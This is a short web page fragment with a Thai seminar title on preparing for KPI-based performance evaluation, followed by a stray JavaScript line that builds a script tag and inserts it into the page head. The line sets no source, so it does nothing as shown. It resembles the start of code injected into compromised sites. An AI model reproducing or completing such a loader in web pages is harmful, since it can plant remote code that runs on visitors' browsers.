ประชุมสัมมนาการเตรียมความพร้อมสู่การประเมินผลการดำเนินงานด้วยตัวชี้วัด (KPIs)

var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s);